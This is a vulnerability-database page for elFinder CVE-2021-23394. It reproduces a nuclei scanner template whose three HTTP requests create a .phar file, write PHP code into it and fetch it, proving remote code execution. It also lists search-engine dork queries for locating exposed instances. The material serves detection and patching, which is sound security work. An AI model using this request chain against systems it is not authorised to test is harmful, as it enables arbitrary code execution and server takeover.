Lucene search
K

elFinder < 2.1.58 - Remote Code Execution

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

ElFinder before 2.1.58 permits remote code execution via phar PHP code when the server parses phar files; update to 2.1.58 or later.

Related
Refs
Code
id: CVE-2021-23394

info:
  name: elFinder < 2.1.58 - Remote Code Execution
  author: 0xanis
  severity: high
  description: |
    studio-42/elfinder before 2.1.58 contains a remote code execution caused by execution of PHP code in a .phar file, letting attackers execute arbitrary PHP code if the server parses .phar files as PHP, exploit requires server to parse .phar files as PHP.
  impact: |
    Attackers can execute arbitrary PHP code on the server, potentially leading to full server compromise.
  remediation: |
    Update to version 2.1.58 or later.
  reference:
    - https://github.com/Studio-42/elFinder/issues/3295
    - https://blog.sonarsource.com/elfinder-the-story-of-a-file-manager-and-a-bunch-of-vulnerabilities
    - https://snyk.io/vuln/SNYK-PHP-STUDIO42ELFINDER-1290554
    - https://nvd.nist.gov/vuln/detail/CVE-2021-23394
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2021-23394
    cwe-id: CWE-434
    epss-score: 0.19083
    epss-percentile: 0.96974
    cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: std42
    product: elfinder
    shodan-query: http.title:"elfinder"
    fofa-query: title="elfinder"
    google-query: intitle:"elfinder"
  tags: cve,cve2021,elfinder,rce,phar,file-upload,intrusive,vkev

variables:
  filename: "{{randstr}}"
  payload_str: "{{randstr}}"

http:
  - raw:
      - |
        GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{filename}}.phar HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'isowner', 'createext', 'added')
          - contains(content_type, 'application/json')
          - status_code == 200
        condition: and
        internal: true

    extractors:
      - type: json
        name: hash
        part: body
        json:
          - ".added[0].hash"
        internal: true

  - raw:
      - |
        GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content=<?='';+echo+md5('{{payload_str}}');+?> HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'isowner', 'phash', 'changed')
          - contains(content_type, 'application/json')
          - status_code == 200
        condition: and
        internal: true

  - raw:
      - |
        GET /elFinder/files/{{filename}}.phar HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "{{md5(payload_str)}}"
# digest: 4a0a004730450221008e36df2ffd53caa5a9099cefe82ca7f2bc8ca118742b14bb11c69f73901c8f46022067392a2c1fd0ac60a0a295ef56f3e197e2e05fcfbd8560bb982f7c08c3a72199:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.9High risk
Vulners AI Score7.9
CVSS 26.8
CVSS 3.18.1 - 9.8
EPSS0.19083
29